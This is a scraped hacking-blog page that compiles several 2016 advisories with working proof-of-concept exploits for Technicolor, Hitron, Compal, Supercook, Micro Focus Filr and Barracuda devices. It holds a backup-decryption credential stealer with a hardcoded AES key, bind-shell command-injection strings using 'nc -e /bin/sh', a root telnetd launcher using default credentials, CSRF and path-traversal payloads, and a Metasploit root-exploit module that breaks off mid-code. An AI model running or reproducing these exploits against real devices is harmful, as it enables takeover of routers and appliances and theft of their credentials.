'''
Technicolor TC7200 modem/router multiple vulnerabilities
--------------------------------------------------------
Platforms / Firmware confirmed affected:
- Technicolor TC7200, STD6.02.11
- Product page: http://www.technicolor.com/en/solutions-services/connected-home/broadband-devices/cable-modems-gateways/tc7200-tc7300
Vulnerabilities
---------------
Insecure session management
The web interface does not use cookies at all and does not check the IP
address of the client. If admin login is successful, every user from the
LAN can access the management interface.
Backup file encryption uses fix password
Technicolor fixed the CVE-2014-1677 by encrypting the backup file with
AES. However, the encrypted backup file remains accessible without
authentication and if the password is not set in the web interface a
default password is used. So, if an attacker accesses the backup file
without authentication, the password cannot be set, and the backup file
can be decrypted.
Timeline
--------
- 2015.07.30: We sent some new issues affecting the Ubee router and other findings in Technicolor TC7200 and Cisco EPC3925 devices to UPC
- Between 2015.07.31 and 08.12 there were several e-mail and phone communications between technical persons from Liberty Global to clarify the findings
- 2015.08.19: UPC sent out advisory emails to its end users to change the default WiFi passphrase
- 2016.01.27: UPC Magyarorszag send out a repeated warning to its end users about the importance of the change of the default passphrases.
- 2016.02.16: Face to face meeting with Liberty Global security personnel in Amsterdam headquarters
- 2016.02.18: A proposal was sent to Liberty Global suggesting a wardriving experiment in Budapest, Hungary to measure the rate of end users who are still using the default passphrases.
POC
---
POC script is available to demonstrate the following problems [2]:
- Unauthenticated backup file access
- Backup file decryption
Recommendations
---------------
Since only the ISP can update the firmware, we can recommend for users
to change the WiFi passphrase.
Credits
-------
This vulnerability was discovered and researched by Gergely Eberhardt
from SEARCH-LAB Ltd. (www.search-lab.hu)
References
----------
[1] http://www.search-lab.hu/advisories/secadv-20160720
[2] https://github.com/ebux/Cable-modems/tree/master/Technicolor
'''
#
# POC code for Technicolor TC7200
#
# Demonstrates the following vulnerabilities
# - Unauthenticated backup file access
# - Backup file decryption
#
# Credit: Gergely Eberhardt (@ebux25) from SEARCH-LAB Ltd. (www.search-lab.hu)
#
# Advisory: http://www.search-lab.hu/advisories/secadv-20150720
import sys
import requests
import struct
import binascii
from Crypto.Cipher import AES
class technicolor:
def __init__(self, addr, port):
self.addr = addr
self.port = port
self.s = requests.Session()
def getUri(self, uri):
return 'http://%s:%d/%s'%(self.addr,self.port,uri)
def downloadBackupFile(self):
r = self.s.get(self.getUri('goform/system/GatewaySettings.bin'))
resp = ''
for chunk in r:
resp += chunk
return resp
def parseBackup(self, backup):
p = backup.find('MLog')
if (p > 0):
p += 6
nh = struct.unpack('!H',backup[p:p+2])[0]
name = backup[p+2:p+2+nh]
p += 2+nh
ph = struct.unpack('!H',backup[p:p+2])[0]
pwd = backup[p+2:p+2+nh]
return (name,pwd)
return ('','')
def decryptBackup(self, backup):
key = binascii.unhexlify('000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F')
l = (len(backup)/16)*16
cipher = AES.new(key, AES.MODE_ECB, '\x00'*(16))
plain = cipher.decrypt(backup[0:l])
return plain
#------------------------------------
if (len(sys.argv) < 2):
print 'technicolor_tc7200_poc.py addr [port]'
addr = sys.argv[1]
port = 80
if (len(sys.argv) == 3):
port = int(sys.argv[2])
# create technicolor object
t = technicolor(addr, port)
backup = t.downloadBackupFile()
if (len(backup) > 0):
open('test.enc', 'wb').write(backup)
plain = t.decryptBackup(backup)
open('test.dec', 'wb').write(plain)
(name, pwd) = t.parseBackup(plain)
if (name != ''):
print 'admin name: %s, pwd: %s'%(name,pwd)
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863290116
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Hitron CGNV4 modem/router multiple vulnerabilities
--------------------------------------------------
Platforms / Firmware confirmed affected:
- Hitron CGNV4, 4.3.9.9-SIP-UPC
- Product page: http://www.hitrontech.com/en/cable_detail.php?id=62
Vulnerabilities
---------------
Insecure session management
The web interface uses insecure cookies, which can be brute-forced
easily (e.g cookie: userid=0). If admin login is successful, the IP
address of the admin user is stored and everybody can access the
management interface with the same IP.
Missing CSRF protection
The web interface is not used any CSRF protection. In case of a valid
session exists, the attacker can modify any settings of the router. If
the default admin password was not changed, the attacker can perform a
login also and modify any settings after it.
Authenticated command injection
The ping diagnostic function is vulnerable to system command injection,
because the parameters are checked only at the client side. Using the
following ping target, the attacker can gain local root access to the
device:
“google.com;nc -l -p 1337 -e /bin/sh;echo”.
Disclaimer
----------
We found these vulnerabilities within a very short time range (3 hours),
and we did not check a lot of areas such as:
- Command injections in other modules
- Buffer overflows
- User authentication
- Default SSID and passphrase
- Analysis of the backup file
- Device configuration (such as SNMP)
Timeline
--------
- 2015.10.16: Vulnerabilities found in the Hitron CGNV4 were reported to UPC Magyarorszag and Liberty Global
- 2016.01.27: UPC Magyarorszag send out a repeated warning to its end users about the importance of the change of the default passphrases.
- 2016.02.16: Face to face meeting with Liberty Global security personnel in Amsterdam headquarters
- 2016.02.18: A proposal was sent to Liberty Global suggesting a wardriving experiment in Budapest, Hungary to measure the rate of end users who are still using the default passphrases.
Recommendations
---------------
We do not know about any possible solution. Firmware update should
install the ISP after the fix will be ready.
Credits
-------
This vulnerability was discovered and researched by Gergely Eberhardt
from SEARCH-LAB Ltd. (www.search-lab.hu)
References
----------
[1] http://www.search-lab.hu/advisories/secadv-20160720
Compal CH7465LG-LC modem/router multiple vulnerabilities
--------------------------------------------------------
The following vulnerabilities are the result of a quick check (~3 hours)
of the Mercury modem. We performed a systematic and deeper evaluation of
this device also, which result will be described in a separate report [2] and advisory.
Platforms / Firmware confirmed affected:
- Compal CH7465LG-LC, CH7465LG-NCIP-4.50.18.13-NOSH
Vulnerabilities
---------------
Insecure session management
The web interface uses cookies, but is not verified. Thus, if admin
login is successful, the IP address and the browser type of the admin
user are stored and everybody can access the management interface with
the same IP and the same user-agent.
Information leakage
Some information requests can be performed without authentication. For
example an attacker can obtain the following information pieces:
- Global settings (SW version, vendor name, etc.)
- CSRF token
- Event log
- LAN user table
- Ping response
Unauthenticated deny of service attack
Factory reset can be initiated without authentication with a simple POST
request to the getter.xml.
Unauthenticated configuration changes
Some settings modification can be performed without authentication, for
example the first install flag and the ping command.
Unauthenticated command injection
The ping diagnostic function is vulnerable to system command injection,
because parameters are checked only at the client side. Using the
following ping target, the attacker can gain local root access to the
device:
“token=<csrf_token>&fun=126&Type=0&Target_IP=127.0.0.1&Ping_Size=64;nc
-l -p 1337 -e /bin/sh;&Num_Ping=3&Ping_Interval=1”
Timeline
--------
- 2015.10.21: SEARCH-LAB received two sample boxes from the Compal Mercury devices from UPC Magyarorszag
- 2015.10.21: Within three hours we reported a remotely exploitable vulnerability on the device
- 2015.10.21: Liberty Global asked for a commercial proposal on executing an overall security evaluation of the Compal device.
- 2015.10.24: A proposal was sent to Liberty Global.
- 2015.11.09: Liberty Global asked to execute the evaluation as a pilot project without financial compensation.
- 2015.12.07: End Use Certificate for Dual-Use Items was asked from Liberty Global as the developer of the device is located in China.
- 2016.01.07: The 99-page-long Evaluation Report on Compal Mercury modem was sent to Liberty Global with the restriction that they are not allowed to forward it outside of the European Union until a signed End Use Certificate is received.
- 2016.01.07: First reaction to the report said: “Bloody hell, that is not a small document ;)”
- 2016.01.11: Liberty Global sent the signed End Use Certificate for Dual-Use Items to SEARCH-LAB
- 2016.01.27: UPC Magyarorszag send out a repeated warning to its end users about the importance of the change of the default passphrases.
- 2016.02.16: Face to face meeting with Liberty Global security personnel in Amsterdam headquarters
- 2016.02.18: A proposal was sent to Liberty Global suggesting a wardriving experiment in Budapest, Hungary to measure the rate of end users who are still using the default passphrases.
Recommendations
---------------
We do not know about any possible solution. Firmware update should install the ISP after the fix will be ready.
Credits
-------
This vulnerability was discovered and researched by Gergely Eberhardt from SEARCH-LAB Ltd. (www.search-lab.hu)
References
----------
[1] http://www.search-lab.hu/advisories/secadv-20160720
[2] http://www.search-lab.hu/media/Compal_CH7465LG_Evaluation_Report_1.1.pdf
'''
Bellini/Supercook Wi-Fi Yumi SC200 - Multiple vulnerabilities
Reported By:
==================================
James McLean -
Primary: james dot mclean at gmail dot com
Secondary: labs at juicedigital dot net
Device Overview:
==================================
From http://www.supercook.me/en/supercook/articles/btmkm800x/
"The Bellini.SUPERCOOK Kitchen Master is much more than a multifunctional
kitchen machine. It has 13 functions so not only saves a huge amount of
time, it also incorporates the Yumi control module and its own recipe
collection, making it incredibly easy to use."
Vulnerability Overview:
==================================
Vuln1) Weak Username/Password for 'root' account.
Vuln2) Information disclosure, unauthenticated.
Vuln3) Remote arbitrary code execution.
CVE ID's
==================================
None assigned as yet.
Disclosure Timeline
==================================
2016-06-01: Vulnerability assessment commenced.
2016-07-04: Contacted Supercook.me support via Web Contact. No response.
2016-07-12: Contacted Supercook.me support via Web Contact. No response.
2016-07-12: Contacted Supercook Australia via Facebook. Supercook responded, saying they will view the support request. No further response recieved.
2016-07-19: Contacted Supercook Australia via Facebook. No response.
2016-07-21: Posted security assessment to vortex.id.au.
2016-07-22: Mitre contacted, CVE ID's requested.
It is with regret, but ultimately due to my concern for the community
that own these devices, that due to lack of communication I am disclosing
these vulnerabilities without the involvment of the vendor. I sincerely hope
that the vendor can resolve these issues in a timely manner.
I intend no malice by releasing these vulnerabilities, and only wish to
inform the community so appropriate steps may be taken by the owners of
these devices.
Due to the nature of the firmware on the device, these issues are not likely
caused by the vendor themselves.
Please do not use the information presented here for evil.
Affected Platforms:
==================================
Bellini/Supercook Wi-Fi Yumi SC200 - Confirmed affected: Vuln1, Vuln2, Vuln3.
Bellini/Supercook Wi-Fi Yumi SC250 - Likely affected, Vuln1, Vuln2, Vuln3, as
same firmware is used.
As the Wi-fi Yumi firmware appears to be based on a stock firmware image
used on a number of other commodity 'IoT' devices, the vulnerabilities
described here are very likely to affect other devices with similar or
the same firmware.
--
Vuln1 Details:
==================================
Weak Username/Password for Root-level account.
Username: super
Password: super
These credentials provide access to the built in FTP server and web
administration interface. We did not attempt any more than a cursory
connection to the FTP server with these details.
According to the details disclosed in Vuln2, an additional account is present
on the device with the following credentials:
Username: admin
Password: AlpheusDigital1010
With the exception of a cursory check of the built in FTP service (which
failed for these credentials), we did not attempt to access the device with
these credentials.
Vuln1 Notes:
==================================
We did not attempt to change or ascertain if it was possible to change these
access credentials; as Vuln2 completely negates any change made.
Vuln1 Mitigation:
==================================
Isolate the Supercook Wi-fi Yumi from any other Wireless network.
Revert to the non-wifi Yumi controller.
--
Vuln2 Details:
==================================
Information disclosure, unauthenticated.
Device URL: http://10.10.1.1/Setting.chipsipcmd
The device offers, via its built in webserver, a full list of all configuration
parameters available. This list includes the above mentioned root account
username and password, and the password to the parent connected wifi network.
All details are in plain text, and transmitted in the format of a key-value
pair making retrieval, recovery and use of all configuration
information trivial.
This interface is also available from the parent wi-fi network via DHCP assigned
IPv4 address.
Vuln2 Notes:
==================================
Example data returned:
DEF_IP_ADDR=10.10.1.1
DEF_SUBNET_MASK=255.255.255.0
...
DEF_SUPER_NAME="super"
DEF_SUPER_PASSWORD="super"
DEF_USER_NAME="admin"
DEF_USER_PASSWORD="AlpheusDigital1010"
...
Vuln2 Mitigation:
==================================
Isolate the Supercook Wi-fi Yumi from any other Wireless network, only using
the mobile application to upload recipes, then disconnect from the device and
connect your mobile device to a trusted network once again to access the
internet once again.
Revert to the non-wifi Yumi controller.
The vendor should establish a method of authentication to the device from the
various mobile applications available, and transport any configuration in an
encrypted format using keys which are not generally available or easily
discoverable.
--
Vuln3 Details:
==================================
Remote arbitrary code execution.
Device URL: http://10.10.1.1/syscmd.asp
The device offers a built-in web-shell which, once authenticated using the
details discovered in Vuln2, allows the execution of any command the device
can execute - as the built in webserver runs as the root user.
It is possible to execute a command using this interface that would create
any file in any location. This would allow an attacker to establish persistence.
Additionally, the built in busybox binary includes the option
'telnetd', meaning it is
possible to execute the relevant command to start a telnet daemon remotely.
The running daemon then requires no authentication to connect, and runs as
the root account.
Vuln3 Mitigation:
==================================
Isolate the Supercook Wi-fi Yumi from any other Wireless network.
Revert to the non-wifi Yumi controller.
Remove or prevent access to /syscmd.asp and /goform/formSysCmd scripts (Please
mind your warranty if you modify the files on the device).
The vendor should disable any and all commands on the device and scripts in
the web interface which are not specifically required for the normal
functionality of the device or its communication with control apps.
In this instance, the vendor should REMOVE the page '/syscmd.asp' and also
/goform/formSysCmd which processes commands submitted via syscmd.asp to prevent
arbitrary commands from being executed.
Additionally, busybox should be recompiled such that the 'telnetd' option is
no longer available to be executed.
--
Vuln1/Vuln2/Vuln3 Risks:
==================================
Weak and easily discoverable root credentials combined with easily accessed
remote shell functionality is a dangerous combination. These vulnerabilities
could allow any sufficiently advanced malware to become persistent in a LAN
and re-infect hosts at will (advanced crypto-locker style malware comes to
mind), capture and exfiltrate data on either Wireless network the device is
connected to, MITM any traffic routed through the device, or other as yet
unknown attack vectors.
Additionally, as full root access is easily obtainable, it may be possible
for an attacker to cause the cooking functionality to behave erratically or
possibly even dangerously due to the built in spinning blades and heating
elements. While we ultimately did not attempt to control these aspects of the
device due to the fact that it makes our dinner most nights, these risks are
worth raising.
This vulnerability assessment should not be considered an exhaustive list
of all vunlnerabilities the device may have. Due to time constraints we were
unable to invest the required time to discover and document all issues. Due to
the nature of the firmware on the device, most of these have likely been
discovered in other products at various times, this item may even duplicate
another from a similar device.
Notes:
==================================
No security assessment of code used for control of cooker functionality was
undertaken; as this does not, in my opinion, rate as seriously as the other
vulnerabilities discovered and disclosed here. However, it should be noted,
that with the root access that is VERY easily obtained, it may be possible for
an attacker to cause the cooking functionality of the machine to behave
erratically or even dangerously due to the built in spinning blades and heating
elements. Further to this, a malicious partner or offspring may intentionally
sabotage dinner, if he/she would prefer to eat takeout.
No attempt was made to connect to or manipulate files on the built in Samba
shares, however given the weak credentials sufficiently advanced malware may be
able to use these shares to establish persistence.
The 'Bellini' name may be regional, our device was procured in Australia and
as such may or may not have a different name in other countries.
A full, detailed, rundown and commentary is available at
https://www.vortex.id.au/2016/07/bellini-supercook-yumi-wi-fi-the-insecurity-perspective/
Vuln3 Proof of Concept:
==================================
'''
#!/usr/bin/env python
import urllib
import urllib2
from subprocess import call
# Connect to the device's wifi network, then run.
# Root access will be provided.
url = 'http://10.10.1.1/goform/formSysCmd'
cmd = 'busybox telnetd -l /bin/sh'
username = 'super'
password = 'super'
# setup the password handler
basicauth = urllib2.HTTPPasswordMgrWithDefaultRealm()
basicauth.add_password(None, url, username, password)
authhandler = urllib2.HTTPBasicAuthHandler(basicauth)
opener = urllib2.build_opener(authhandler)
urllib2.install_opener(opener)
# Connect to the device, send the data
values = {
'sysCmd': cmd,
'apply': 'Apply',
'submit-url': '/syscmd.asp'
}
data = urllib.urlencode(values)
pagehandle = urllib2.urlopen(url, data)
# Connect to Telnet.
call(["telnet","10.10.1.1"])
# Pwnd.
# End of document.
SEC Consult Vulnerability Lab Security Advisory < 20160725-0 >
=======================================================================
title: Multiple vulnerabilities
product: Micro Focus (former Novell) Filr Appliance
vulnerable version: Filr 2 <=2.0.0.421, Filr 1.2 <= 1.2.0.846
fixed version: Filr 2 v2.0.0.465, Filr 1.2 v1.2.0.871
CVE number: CVE-2016-1607, CVE-2016-1608, CVE-2016-1609
CVE-2016-1610, CVE-2016-1611
impact: critical
homepage: https://www.novell.com/products/filr/
found: 2016-05-23
by: W. Ettlinger (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Unlike other mobile file access and collaborative file sharing solutions, Micro
Focus Filr has been designed with the enterprise in mind, resulting in less
administration, better security and more productive users."
URL: https://www.novell.com/products/filr/
Business recommendation:
------------------------
During a very quick security check several vulnerabilities with high impact
have been discovered. SEC Consult recommends to immediately apply the patches
provided by Micro Focus to address these issues.
Please note that since SEC Consult did not conduct a thorough technical security
check SEC Consult cannot make a statement regarding the overall security of the
Micro Focus Filr appliance.
Vulnerability overview/description:
-----------------------------------
During a quick security check several vulnerabilities have been identified that
ultimately allow an attacker to completely compromise the appliance:
1) Cross Site Request Forgery (CSRF) - CVE-2016-1607
Several functions within the appliance's administative interface lack protection
against CSRF attacks. This allows an attacker who targets an authenticated
administrator to reconfigure the appliance.
2) OS Command Injection - CVE-2016-1608
The appliance administrative interface allows an authenticated attacker to
execute arbitrary operating system commands. Please note that an attacker can
combine this vulnerability with vulnerability #1. In this scenario, an attacker
does not need to be authenticated.
3) Insecure System Design
The appliance uses a Jetty application server to provide the appliance
administration interface. This application server is started as the superuser
"root". Please note that combined with vulnerability #1 and #2 an attacker can
run commands as the superuser "root" without the need for any authentication.
For vendor remark on #3 see solution section.
4) Persistent Cross-Site Scripting - CVE-2016-1609
The Filr web interface uses a blacklist filter to try to strip any JavaScript
code from user input. However, this filter can be bypassed to persistently
inject JavaScript code into the Filr web interface.
5) Missing Cookie Flags
The httpOnly cookie flag is not set for any session cookies set by both the
administrative appliance web interface and the Filr web interface. Please note
that combined with vulnerability #4 an attacker can steal session cookies of
both the appliance administration interface and the Filr web interface (since
cookies are shared across ports).
For vendor remark on #5 see solution section.
6) Authentication Bypass - CVE-2016-1610
An unauthenticated attacker is able to upload email templates.
7) Path Traversal - CVE-2016-1610
The functionality that allows an administrator to upload email templates fails
to restrict the directory the templates are uploaded to. Please note that
combined with vulnerability #6 an attacker is able to upload arbitray files with
the permissions of the system user "wwwrun".
8) Insecure File Permissions - CVE-2016-1611
A file that is run upon system user login is world-writeable. This allows a local
attacker with restricted privileges to inject commands that are being executed
as privileged users as soon as they log into the system. Please note that
combined with vulnerabilities #6 and #7 an unauthenticated attacker can inject
commands that are executed as privileged system users (e.g. root) using the Filr
web interface.
Proof of concept:
-----------------
1, 2, 3)
The following HTML fragment demonstrates that using a CSRF attack (#1) system
commands can be injected (#2) that are executed as the user root (#3):
----- snip -----
<html>
<body>
<form action="https://<host>:9443/vaconfig/time" method="POST">
<input type="hidden" name="ntpServer" value="0.novell.pool.ntp.org 1.novell.pool.ntp.org';id>/tmp/test;'" />
<input type="hidden" name="region" value="europe" />
<input type="hidden" name="timeZone" value="Europe/Vienna" />
<input type="hidden" name="utc" value="true" />
<input type="hidden" name="_utc" value="on" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
----- snip -----
4)
The following string demonstrates how the XSS filter can be circumvented:
<img src='>' onerror='alert(1)'>
This string can e.g. be used by a restricted user in the "phone" field of the
user profile. The script is executed by anyone viewing the profile (e.g. admins).
5)
None of the session cookies are set with the httpOnly flag.
6, 7, 8)
The following Java fragment demonstrates how an unauthenticated attacker (#6)
can overwrite a file in the filesystem (#7 & #8) that is executed upon user login
of e.g. the root user:
----- snip -----
String sessionCookie = "sectest";
String host = "http://<host>/";
ProxySettings settings = new ProxySettings();
HttpCookie cookie = new HttpCookie("JSESSIONID", sessionCookie);
settings.setCookieManager(new CookieManager());
settings.getCookieManager().getCookieStore().add(new URI(host), cookie);
settings.setModuleBaseUrl(host + "ssf/gwt/");
settings.setRemoteServiceRelativePath("gwtTeaming.rpc");
settings.setPolicyName("338D4038939D10E7FC021BD64B318D99");
GwtRpcService svc = SyncProxy.createProxy(GwtRpcService.class, settings);
VibeXsrfToken token = new VibeXsrfToken(
StringUtils.toHexString(Md5Utils.getMd5Digest(sessionCookie.getBytes())));
((HasRpcToken) svc).setRpcToken(token);
String fileName = "../../../../etc/profile.d/vainit.sh";
FileBlob fileBlob = new FileBlob(ReadType.TEXT, fileName, "", 1l, 4, 1l, false, 4l);
fileBlob.setBlobDataString("id > /tmp/profiledtest\n");
BinderInfo folderInfo = new BinderInfo();
folderInfo.setBinderId((long) 1);
folderInfo.setBinderType(BinderType.WORKSPACE);
folderInfo.setWorkspaceType(WorkspaceType.EMAIL_TEMPLATES);
VibeRpcCmd cmd = new UploadFileBlobCmd(folderInfo, fileBlob, true);
HttpRequestInfo ri = new HttpRequestInfo();
svc.executeCommand(ri, cmd);
----- snip -----
Vulnerable / tested versions:
-----------------------------
The version 2.0.0.421 of Micro Focus Filr was found to be vulnerable. This version
was the latest version at the time of the discovery.
According to the vendor, Filr 1.2 is also vulnerable.
Vendor contact timeline:
------------------------
2016-05-23: Sending encrypted advisory to security@novell.com, Setting latest
possible release date to 2016-07-12
2016-05-24: Initial response from Micro Focus: forwarded the information to Filr
engineering team
2016-06-13: Micro Focus releases patch to address issue #8
2016-06-14: Requested status update
2016-06-14: Micro Focus expects release of the patches in early July
2016-06-30: Asking for status update, answer of Micro Focus
2016-07-06: Micro Focus needs more time to patch issues, release re-scheduled for 15th
2016-07-12: Asking for status update; "final rounds of QA" at Micro Focus
2016-07-16: Postponing advisory release, patch not yet ready
2016-07-22: Patch release by Micro Focus
2016-07-25: Coordinated advisory release
Solution:
---------
The "Filr 2.0 Security Update 2" can be downloaded here and should
be applied immediately:
https://download.novell.com/Download?buildid=3V-3ArYN85I~
Those patches fix vulnerabilities #1, #2, #4, #6, #7
"Filr 1.2 Security Update 3" can be found here:
https://download.novell.com/Download?buildid=BOTiHcBFfv0~
Knowledge base references at Micro Focus:
Issue #1: https://www.novell.com/support/kb/doc.php?id=7017786
Issue #2: https://www.novell.com/support/kb/doc.php?id=7017789
Issue #4: https://www.novell.com/support/kb/doc.php?id=7017787
Issue #6 & #7: https://www.novell.com/support/kb/doc.php?id=7017788
Local privilege escalation via insecure file permissions (#8) has
already been fixed in the Filr 2.0 security update 1 in June:
https://www.novell.com/support/kb/doc.php?id=7017689
Issue #3: According to Micro Focus, Jetty actually runs as user
"vabase-jetty" but will pass commands off to another service on
the box that runs as root to perform privileged actions.
They have fixed the command injection in this release and the
next release will include much more stringent parameter validation
for passing the commands.
Issue #5: According to Micro Focus, a component of Filr does not
function properly when the httpOnly flag is enabled. This will be
addressed in a future release.
Workaround:
-----------
None
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF W. Ettlinger / @2016
# Exploit Title: Barracuda Web App Firewall/Load Balancer Post Auth Remote Root Exploit (2)
# Date: 07/25/16
# Exploit Author: xort xort@blacksecurity.org
# Vendor Homepage: https://www.barracuda.com/
# Software Link: https://www.barracuda.com/products/loadbalance & https://www.barracuda.com/products/webapplicationfirewall
# Version: Load Balancer Firmware <= v5.4.0.004 (2015-11-26) & Web App Firewall Firmware <= v8.0.1.007 (2016-01-07)
# Tested on: Load Balancer Firmware <= v5.4.0.004 (2015-11-26) & Web App Firewall Firmware <= 8.0.1.007 (2016-01-07)
# CVE : None.
# This exploit combines 2 bugs to leverage root access
# Vuln 1: ondefined_view_template trigger - File upload vuln
# Vuln 2: ondefined_remove_corefiles trigger - Command injection vuln (from loaded file data)
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Barracuda Web App Firewall/Load Balancer Post Auth Remote Root Exploit (2)',
'Description' => %q{
This module exploits a remote command execution vulnerability in
the Barracuda Web App Firewall Firmware Version <= 8.0.1.007 and Load Balancer Firmware <= v5.4.0.004
by exploiting a two vulnerabilities in the web administration interface. The first bug leverages a Arbitrary File
Upload vulnerability to create a malicious file containing shell commands before using a second bug meant to clean
up left-over core files on the device to execute them. By sending a specially crafted requests
it's possible to inject system commands while escalating to root do to relaxed sudo configurations on the applianaces.
},
'Author' =>
[
'xort', # vuln + metasploit module
],
'Version' => '$Revision: 2 $',
'References' =>
[
[ 'none', 'none'],
],
'Platform' => [ 'linux'],
'Privileged' => true,
'Arch' => [ ARCH_X86 ],
'SessionTypes' => [ 'shell' ],
'Privileged' => false,
'Payload' =>
{
'Compat' =>
{
'ConnectionType' => 'find',
}
},
'Targets' =>
[
['Barracuda Web App Firewall Firmware Version <= 8.0.1.007 (2016-01-07)',
{
'Arch' => ARCH_X86,
'Platform' => 'linux',
'SudoCmdExec' => "/home/product/code/firmware/current/bin/config_agent_wrapper.pl"
}
],
['Barracuda Load Balancer Firmware <= v5.4.0.004 (2015-11-26)',
{
'Arch' => ARCH_X86,
'Platform' => 'linux',
'SudoCmdExec' => "/home/product/code/firmware/current/bin/rdpd"
}
],
],
'DefaultTarget' => 0))
register_options(
[
OptString.new('PASSWORD', [ false, 'Device password', "" ]),
OptString.new('ET', [ false, 'Device password', "" ]),
OptString.new('USERNAME', [ true, 'Device password', "admin" ]),
OptString.new('CMD', [ false, 'Command to execute', "" ]),
Opt::RPORT(8000),
], self.class)
end
def do_login(username, password_clear, et)
vprint_status( "Logging into machine with credentials...\n" )
# vars
timeout = 1550;
enc_key = Rex::Text.rand_text_hex(32)
# send request
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/cgi-mod/index.cgi",
'headers' =>
{
'Accept' => "application/json, text/javascript, */*; q=0.01",
'Content-Type' => "application/x-www-form-urlencoded",
'X-Requested-With' => "XMLHttpRequest"
},
'vars_post' =>
{
'enc_key' => enc_key,
'et' => et,
'user' => "admin", # username,
'password' => "admin", # password_clear,
'enctype' => "none",
'password_entry' => "",
'login_page' => "1",
'login_state' => "out",
'real_user' => "",
'locale' => "en_US",
'form' => "f",
'Submit' => "Sign in",
}
}, timeout)
# get rid of first yank
password = res.body.split('\n').grep(/(.*)password=([^&]+)&/){$2}[0] #change to match below for more exact result
et = res.body.split('\n').grep(/(.*)et=([^&]+)&/){$2}[0]
return password, et
end
def run_command(username, password, et, cmd)
vprint_status( "Running Command...\n" )
# file to overwrite
cmd_file = "/home/product/code/config/corefile_list.txt"
# file to replace
sudo_cmd_exec = target['SudoCmdExec']
sudo_run_cmd_1 = "sudo /bin/cp /bin/sh #{sudo_cmd_exec} ; sudo /bin/chmod +x #{sudo_cmd_exec}"
sudo_run_cmd_2 = "sudo #{sudo_cmd_exec} -c "
# random filename to dump too + 'tmp' HAS to be here.
b64dumpfile = "/tmp/" + rand_text_alphanumeric(4+rand(4))
# decoder stubs - tells 'base64' command to decode and dump data to temp file
b64decode1 = "echo \""
b64decode2 = "\" | base64 -d >" + b64dumpfile
# base64 - encode with base64 so we can send special chars and multiple lines
cmd = Base64.strict_encode64(cmd)
# Create injection string.
# a) package the base64 decoder with encoded bytes
# b) attach a chmod +x request to make the script created (b64dumpfile) executable
# c) execute decoded base64 dumpfile
injection_string = b64decode1 + cmd + b64decode2 + "; /bin/chmod +x " + b64dumpfile + "; " + sudo_run_cmd_1 + "; " + sudo_run_cmd_2 + b64dumpfile + " ; rm " + b64dumpfile
exploitreq = [
[ "auth_type","Local" ],
[ "et",et ],
[ "locale","en_US" ],
[ "password", password ],
[ "primary_tab", "BASIC" ],
[ "realm","" ],
[ "secondary_tab","reports" ],
[ "user", username ],
[ "timestamp", Time.now.to_i ],
[ "upload_template_file_filename", "admin" ]
]
boundary = "---------------------------" + Rex::Text.rand_text_numeric(34)
post_data = ""
exploitreq.each do |xreq|
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"#{xreq[0]}\"\r\n\r\n"
post_data << "#{xreq[1]}\r\n"
end
# upload file
up_filename = cmd_file
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"upload_template_file\"; filename=\"../#{up_filename}\"\r\n\r\n"
post_data << ";#{injection_string};\r\n"
# end data
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"view_template\"\r\n\r\n"
post_data << "\r\n"
post_data << "--#{boundary}--\r\n" # end boundary
# upload file vuln
res = send_request_cgi({
'method' => 'POST',
'uri' => "/cgi-mod/index.cgi",
'ctype' => "multipart/form-data; boundary=#{boundary}",
'data' => post_data,
'headers' =>
{
'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0",
'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'Accept-Language' => "en-US,en;q=0.5"
}
})
post_data = ""
exploitreq.each do |xreq|
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"#{xreq[0]}\"\r\n\r\n"
post_data << "#{xreq[1]}\r\n"
end
# triger vuln
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"remove_corefiles\"\r\n\r\n"
post_data << "\r\n"
post_data << "--#{boundary}--\r\n" # end boundary
# upload file vuln
res = send_request_cgi({
